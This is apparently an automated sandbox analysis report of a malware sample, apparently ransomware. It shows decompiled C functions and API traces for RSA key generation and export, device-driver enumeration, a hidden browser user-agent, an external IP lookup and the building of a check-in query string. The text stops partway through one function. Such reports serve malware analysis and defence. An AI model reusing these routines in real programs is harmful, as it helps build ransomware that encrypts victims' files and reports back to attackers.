                                      0x00407d26
                                      0x00407d27
                                      0x00407d28
                                      0x00407d2f
                                      0x00000000
                                      0x00407d31
                                      0x00407d31
                                      0x00407d35
                                      0x00407d37
                                      0x00407d3a
                                      0x00407d41
                                      0x00407d45
                                      0x00407d4e
                                      0x00407d52
                                      0x00407d53
                                      0x00407d41
                                      0x00407d57
                                      0x00407d57
                                      0x00407d2f
                                      0x00407d09
                                      0x00407d09
                                      0x00407d0d
                                      0x00407d15
                                      0x00407d5e
                                      0x00407d5e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407d15
                                      0x00407d65
                                      0x00407d73
                                      0x00000000
                                      0x00407d73
                                      0x00407cb5

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
                                      • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
                                      • GetModuleHandleA.KERNEL32(?), ref: 00407CFF
                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
                                      • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407D73
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D87
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                      • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                      • API String ID: 3996966626-2152921537
                                      • Opcode ID: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
                                      • Instruction ID: 199b4cbb89f92d6933ab86ad2097cfc69592b150d2405189e4f4276a6cc67689
                                      • Opcode Fuzzy Hash: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
                                      • Instruction Fuzzy Hash: 8931F871E04209ABEB109FE4DD49BEEBB78EF44700F204079E505B62A1E775AE01CB6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E00407DB0(intOrPtr __ecx, intOrPtr __edx) {
                                      				long* _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v34;
                                      				short _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				char _v48;
                                      				long** _t25;
                                      				void* _t28;
                                      				struct HINSTANCE__* _t33;
                                      				_Unknown_base(*)()* _t34;
                                      				long _t40;
                                      				void* _t42;
                                      				void* _t46;
                                      				void* _t47;
                                      				void* _t48;
                                      
                                      				_t46 = 0;
                                      				_v16 = __ecx;
                                      				_t25 =  &_v8;
                                      				_v12 = __edx;
                                      				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
                                      				if(_t25 == 0) {
                                      					L10:
                                      					return _t46;
                                      				} else {
                                      					_t42 = 0;
                                      					do {
                                      						_t4 = _t42 + 0x61; // 0x61
                                      						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
                                      						_t42 = _t42 + 1;
                                      					} while (_t42 < 0x1a);
                                      					_t40 = __edx + 1;
                                      					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
                                      					_t47 = _t28;
                                      					if(_t47 == 0 || _v12 >= _t40) {
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t47, 0, 0x8000);
                                      						return 0;
                                      					} else {
                                      						_v48 = 0x70797243;
                                      						_v44 = 0x6e654774;
                                      						_v40 = 0x646e6152;
                                      						_v36 = 0x6d6f;
                                      						_v34 = 0;
                                      						_v32 = 0x61766441;
                                      						_v28 = 0x32336970;
                                      						_v24 = 0x6c6c642e;
                                      						_v20 = 0;
                                      						_t33 = GetModuleHandleA( &_v32);
                                      						if(_t33 != 0) {
                                      							L7:
                                      							_t19 =  &_v48; // 0x70797243
                                      							_t34 = GetProcAddress(_t33, _t19);
                                      							if(_t34 != 0) {
                                      								 *_t34(_v8, _v12, _v16);
                                      								_t46 =  !=  ? 1 : _t46;
                                      							}
                                      						} else {
                                      							_t18 =  &_v32; // 0x61766441
                                      							_t33 = LoadLibraryA(_t18);
                                      							if(_t33 != 0) {
                                      								goto L7;
                                      							}
                                      						}
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t47, 0, 0x8000); // executed
                                      						goto L10;
                                      					}
                                      				}
                                      			}
























                                      0x00407dc0
                                      0x00407dc2
                                      0x00407dc7
                                      0x00407dcd
                                      0x00407dd0
                                      0x00407dd8
                                      0x00407ea2
                                      0x00407eaa
                                      0x00407dde
                                      0x00407dde
                                      0x00407de0
                                      0x00407de0
                                      0x00407de3
                                      0x00407de7
                                      0x00407de8
                                      0x00407df4
                                      0x00407df8
                                      0x00407dfe
                                      0x00407e02
                                      0x00407eb0
                                      0x00407ebe
                                      0x00407ecc
                                      0x00407e11
                                      0x00407e14
                                      0x00407e1c
                                      0x00407e23
                                      0x00407e2a
                                      0x00407e30
                                      0x00407e34
                                      0x00407e3b
                                      0x00407e42
                                      0x00407e49
                                      0x00407e4d
                                      0x00407e55
                                      0x00407e65
                                      0x00407e65
                                      0x00407e6a
                                      0x00407e72
                                      0x00407e7d
                                      0x00407e86
                                      0x00407e86
                                      0x00407e57
                                      0x00407e57
                                      0x00407e5b
                                      0x00407e63
                                      0x00000000
                                      0x00000000
                                      0x00407e63
                                      0x00407e8e
                                      0x00407e9c
                                      0x00000000
                                      0x00407e9c
                                      0x00407e02

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
                                      • VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
                                      • GetModuleHandleA.KERNEL32(?), ref: 00407E4D
                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
                                      • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407E9C
                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                      • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                      • API String ID: 3996966626-2152921537
                                      • Opcode ID: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
                                      • Instruction ID: be5cfa20fe97609e74d06931db444e7d7e20eeaeedb8336480d1c404223e93be
                                      • Opcode Fuzzy Hash: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
                                      • Instruction Fuzzy Hash: FA318471E05209AFEB109FA5DD49BEEBB78EF44701F104079E605B6291D774AE00CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E00405D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                      				long* _v8;
                                      				long* _v12;
                                      				int _v16;
                                      				long** _t15;
                                      				long* _t16;
                                      				long _t23;
                                      
                                      				_t15 =  &_v8;
                                      				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                      				if(_t15 != 0) {
                                      					L6:
                                      					_t16 = _v8;
                                      					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
                                      					if(_t16 == 0) {
                                      					}
                                      					_v16 = 0;
                                      					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
                                      					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
                                      					CryptDestroyKey(_v12);
                                      					CryptReleaseContext(_v8, 0);
                                      					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
                                      					return 1;
                                      				}
                                      				_t23 = GetLastError();
                                      				if(_t23 != 0x80090016) {
                                      					return 0;
                                      				}
                                      				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
                                      				if(_t23 != 0) {
                                      					goto L6;
                                      				}
                                      				return 0;
                                      			}









                                      0x00405d91
                                      0x00405d95
                                      0x00405d9d
                                      0x00405dd5
                                      0x00405de3
                                      0x00405de7
                                      0x00405def
                                      0x00405def
                                      0x00405df2
                                      0x00405e0b
                                      0x00405e23
                                      0x00405e2d
                                      0x00405e39
                                      0x00405e4e
                                      0x00000000
                                      0x00405e54
                                      0x00405d9f
                                      0x00405daa
                                      0x00000000
                                      0x00405dce
                                      0x00405dbb
                                      0x00405dc3
                                      0x00000000
                                      0x00405dcc
                                      0x00000000

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00404916,?,0040491E), ref: 00405D95
                                      • GetLastError.KERNEL32(?,0040491E), ref: 00405D9F
                                      • CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0040491E), ref: 00405DBB
                                      • CryptGenKey.ADVAPI32(0040491E,0000A400,08000001,?,?,0040491E), ref: 00405DE7
                                      • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 00405E0B
                                      • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 00405E23
                                      • CryptDestroyKey.ADVAPI32(?), ref: 00405E2D
                                      • CryptReleaseContext.ADVAPI32(0040491E,00000000), ref: 00405E39
                                      • CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 00405E4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                      • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                      • API String ID: 137402220-1948191093
                                      • Opcode ID: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
                                      • Instruction ID: a5e1c5bc4adb18f4c6cf36d0885f5ae2a65a9070c6c01f648420f3db759758e1
                                      • Opcode Fuzzy Hash: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
                                      • Instruction Fuzzy Hash: FD216A75790308BBEB20CBA0DE4AF9B7779AB88B01F104425F701BA1D0C6B99940DB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED
                                      • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0040690F
                                      • lstrlenW.KERNEL32(004103AC), ref: 0040691C
                                        • Part of subcall function 00407A00: InternetCloseHandle.WININET(?), ref: 00407A13
                                        • Part of subcall function 00407A00: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32
                                      • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 0040694B
                                      • wsprintfW.USER32 ref: 00406963
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00406979
                                      • InternetCloseHandle.WININET(?), ref: 00406987
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                      • String ID: GET$ipv4bot.whatismyipaddress.com
                                      • API String ID: 4289327240-2259699238
                                      • Opcode ID: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
                                      • Instruction ID: 036ff581c335500f2984d10930e2f34b8e696fb6c4e233a2217fb5cd2a6ee9c0
                                      • Opcode Fuzzy Hash: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
                                      • Instruction Fuzzy Hash: 6201B13574020577EB206B729E4EF9F3A38AB85B11F140036FA05F61C1DEB89959C6AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 46%
                                      			E00402F50(WCHAR* __ecx) {
                                      				unsigned int _v8;
                                      				char _v12;
                                      				WCHAR* _v16;
                                      				short _v2064;
                                      				long _t17;
                                      				void* _t18;
                                      				void* _t20;
                                      				WCHAR* _t23;
                                      				int _t25;
                                      				void* _t28;
                                      				unsigned int _t31;
                                      				void* _t35;
                                      				intOrPtr* _t39;
                                      				signed int _t40;
                                      
                                      				_t39 = __imp__EnumDeviceDrivers;
                                      				_v16 = __ecx;
                                      				_v8 = 0;
                                      				 *_t39( &_v12, 4,  &_v8); // executed
                                      				_t17 = _v8;
                                      				if(_t17 != 0) {
                                      					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
                                      					_t35 = _t18;
                                      					if(_t35 != 0) {
                                      						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
                                      						if(_t20 == 0) {
                                      							L10:
                                      							VirtualFree(_t35, 0, 0x8000); // executed
                                      							return 0;
                                      						} else {
                                      							_t40 = 0;
                                      							_t31 = _v8 >> 2;
                                      							if(_t31 > 0) {
                                      								do {
                                      									_t23 =  &_v2064;
                                      									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
                                      									if(_t23 == 0) {
                                      										goto L9;
                                      									} else {
                                      										_t25 = lstrcmpiW( &_v2064, _v16); // executed
                                      										if(_t25 == 0) {
                                      											VirtualFree(_t35, 0, 0x8000);
                                      											return 1;
                                      										} else {
                                      											goto L9;
                                      										}
                                      									}
                                      									goto L12;
                                      									L9:
                                      									_t40 = _t40 + 1;
                                      								} while (_t40 < _t31);
                                      							}
                                      							goto L10;
                                      						}
                                      					} else {
                                      						return _t18;
                                      					}
                                      				} else {
                                      					return _t17;
                                      				}
                                      				L12:
                                      			}

















                                      0x00402f5a
                                      0x00402f69
                                      0x00402f6d
                                      0x00402f74
                                      0x00402f76
                                      0x00402f7b
                                      0x00402f8d
                                      0x00402f93
                                      0x00402f97
                                      0x00402fa8
                                      0x00402fac
                                      0x00402ff2
                                      0x00402ffa
                                      0x00403008
                                      0x00402fae
                                      0x00402fb1
                                      0x00402fb3
                                      0x00402fb8
                                      0x00402fc0
                                      0x00402fc5
                                      0x00402fcf
                                      0x00402fd7
                                      0x00000000
                                      0x00402fd9
                                      0x00402fe3
                                      0x00402feb
                                      0x00403011
                                      0x00403022
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402feb
                                      0x00000000
                                      0x00402fed
                                      0x00402fed
                                      0x00402fee
                                      0x00402fc0
                                      0x00000000
                                      0x00402fb8
                                      0x00402f99
                                      0x00402f9e
                                      0x00402f9e
                                      0x00402f81
                                      0x00402f81
                                      0x00402f81
                                      0x00000000

                                      APIs
                                      • K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 00402F74
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocDeviceDriversEnumVirtual
                                      • String ID:
                                      • API String ID: 4140748134-0
                                      • Opcode ID: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
                                      • Instruction ID: ae1065d34e0a9f40daa088a41d748c469a9f576a3d92cbe81eb507f1f3ca9255
                                      • Opcode Fuzzy Hash: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
                                      • Instruction Fuzzy Hash: 9621A43260011AABEB109B989D89FAAB7BCEB44715F1001B6EE04E61D0D7B19D05AB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 98 4077f0-4079db InternetOpenW 99 4079f2-4079f8 98->99 100 4079dd-4079ef InternetOpenW 98->100 100->99
                                      C-Code - Quality: 100%
                                      			E004077F0(void* __ecx) {
                                      				short _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				intOrPtr _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				intOrPtr _v112;
                                      				intOrPtr _v116;
                                      				intOrPtr _v120;
                                      				intOrPtr _v124;
                                      				intOrPtr _v128;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				intOrPtr _v140;
                                      				intOrPtr _v144;
                                      				intOrPtr _v148;
                                      				intOrPtr _v152;
                                      				intOrPtr _v156;
                                      				intOrPtr _v160;
                                      				intOrPtr _v164;
                                      				intOrPtr _v168;
                                      				intOrPtr _v172;
                                      				intOrPtr _v176;
                                      				intOrPtr _v180;
                                      				intOrPtr _v184;
                                      				intOrPtr _v188;
                                      				intOrPtr _v192;
                                      				intOrPtr _v196;
                                      				intOrPtr _v200;
                                      				intOrPtr _v204;
                                      				intOrPtr _v208;
                                      				intOrPtr _v212;
                                      				intOrPtr _v216;
                                      				intOrPtr _v220;
                                      				short _v224;
                                      				WCHAR* _t62;
                                      				void* _t64;
                                      
                                      				_v8 = 0;
                                      				_v224 = 0x6f004d;
                                      				_v220 = 0x69007a;
                                      				_v216 = 0x6c006c;
                                      				_v212 = 0x2f0061;
                                      				_v208 = 0x2e0035;
                                      				_v204 = 0x200030;
                                      				_v200 = 0x570028;
                                      				_v196 = 0x6e0069;
                                      				_v192 = 0x6f0064;
                                      				_v188 = 0x730077;
                                      				_v184 = 0x4e0020;
                                      				_v180 = 0x200054;
                                      				_v176 = 0x2e0036;
                                      				_v172 = 0x3b0031;
                                      				_v168 = 0x570020;
                                      				_v164 = 0x57004f;
                                      				_v160 = 0x340036;
                                      				_v156 = 0x200029;
                                      				_v152 = 0x700041;
                                      				_v148 = 0x6c0070;
                                      				_v144 = 0x570065;
                                      				_v140 = 0x620065;
                                      				_v136 = 0x69004b;
                                      				_v132 = 0x2f0074;
                                      				_v128 = 0x330035;
                                      				_v124 = 0x2e0037;
                                      				_v120 = 0x360033;
                                      				_v116 = 0x280020;
                                      				_v112 = 0x48004b;
                                      				_v108 = 0x4d0054;
                                      				_v104 = 0x2c004c;
                                      				_v100 = 0x6c0020;
                                      				_v96 = 0x6b0069;
                                      				_v92 = 0x200065;
                                      				_v88 = 0x650047;
                                      				_v84 = 0x6b0063;
                                      				_v80 = 0x29006f;
                                      				_v76 = 0x430020;
                                      				_v72 = 0x720068;
                                      				_v68 = 0x6d006f;
                                      				_v64 = 0x2f0065;
                                      				_v60 = 0x350035;
                                      				_v56 = 0x30002e;
                                      				_v52 = 0x32002e;
                                      				_v48 = 0x380038;
                                      				_v44 = 0x2e0033;
                                      				_v40 = 0x370038;
                                      				_v36 = 0x530020;
                                      				_v32 = 0x660061;
                                      				_v28 = 0x720061;
                                      				_v24 = 0x2f0069;
                                      				_v20 = 0x330035;
                                      				_v16 = 0x2e0037;
                                      				_v12 = 0x360033;
                                      				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
                                      				 *(__ecx + 4) = _t62;
                                      				if(_t62 == 0) {
                                      					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
                                      					 *(__ecx + 4) = _t64;
                                      					return _t64;
                                      				}
                                      				return _t62;
                                      			}




























































                                      0x00407808
                                      0x00407814
                                      0x0040781f
                                      0x00407829
                                      0x00407833
                                      0x0040783d
                                      0x00407847
                                      0x00407851
                                      0x0040785b
                                      0x00407865
                                      0x0040786f
                                      0x00407879
                                      0x00407883
                                      0x0040788d
                                      0x00407897
                                      0x004078a1
                                      0x004078ab
                                      0x004078b5
                                      0x004078bf
                                      0x004078c9
                                      0x004078d3
                                      0x004078dd
                                      0x004078e7
                                      0x004078f1
                                      0x004078fb
                                      0x00407902
                                      0x00407909
                                      0x00407910
                                      0x00407917
                                      0x0040791e
                                      0x00407925
                                      0x0040792c
                                      0x00407933
                                      0x0040793a
                                      0x00407941
                                      0x00407948
                                      0x0040794f
                                      0x00407956
                                      0x0040795d
                                      0x00407964
                                      0x0040796b
                                      0x00407972
                                      0x00407979
                                      0x00407980
                                      0x00407987
                                      0x0040798e
                                      0x00407995
                                      0x0040799c
                                      0x004079a3
                                      0x004079aa
                                      0x004079b1
                                      0x004079b8
                                      0x004079bf
                                      0x004079c6
                                      0x004079cd
                                      0x004079d4
                                      0x004079d6
                                      0x004079db
                                      0x004079ed
                                      0x004079ef
                                      0x00000000
                                      0x004079ef
                                      0x004079f8

                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
                                      • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                      • API String ID: 2038078732-2805935662
                                      • Opcode ID: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
                                      • Instruction ID: 8ec0cbb63084930b06e9c442bfdedbe0f88dfa63fe684bf69a99aafbe0ca1518
                                      • Opcode Fuzzy Hash: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
                                      • Instruction Fuzzy Hash: 0541A8B4811369DEEB21CF91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 101 4069a0-4069b8 102 4069ba-4069da lstrcatW * 4 101->102 103 4069dc-4069df 101->103 102->103 104 4069e1-4069fb lstrcatW * 4 103->104 105 4069fd-406a01 103->105 104->105 106 406a03-406a1d lstrcatW * 4 105->106 107 406a1f-406a23 105->107 106->107 108 406a41-406a45 107->108 109 406a25-406a3f lstrcatW * 4 107->109 110 406a63-406a67 108->110 111 406a47-406a61 lstrcatW * 4 108->111 109->108 112 406a85-406a89 110->112 113 406a69-406a83 lstrcatW * 4 110->113 111->110 114 406aa7-406aab 112->114 115 406a8b-406aa5 lstrcatW * 4 112->115 113->112 116 406ac9-406acd 114->116 117 406aad-406ac7 lstrcatW * 4 114->117 115->114 118 406aeb-406aef 116->118 119 406acf-406ae9 lstrcatW * 4 116->119 117->116 120 406af1-406b0a VirtualAlloc 118->120 121 406b5c-406b60 118->121 119->118 122 406b21-406b2d wsprintfW 120->122 123 406b0c-406b1f wsprintfW 120->123 124 406b62-406b7c lstrcatW * 4 121->124 125 406b7e-406b92 lstrlenW 121->125 126 406b30-406b56 lstrcatW * 4 VirtualFree 122->126 123->126 124->125 126->121
                                      C-Code - Quality: 100%
                                      			E004069A0(intOrPtr* __ecx, WCHAR* _a4) {
                                      				WCHAR* _t47;
                                      				intOrPtr* _t91;
                                      				intOrPtr _t94;
                                      				WCHAR* _t96;
                                      
                                      				_t91 = __ecx;
                                      				_t96 = _a4;
                                      				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
                                      					lstrcatW(_t96,  *(__ecx + 0x88));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x84));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *_t91 != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 4));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 8));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x10));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x14));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x1c));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x20));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x28));
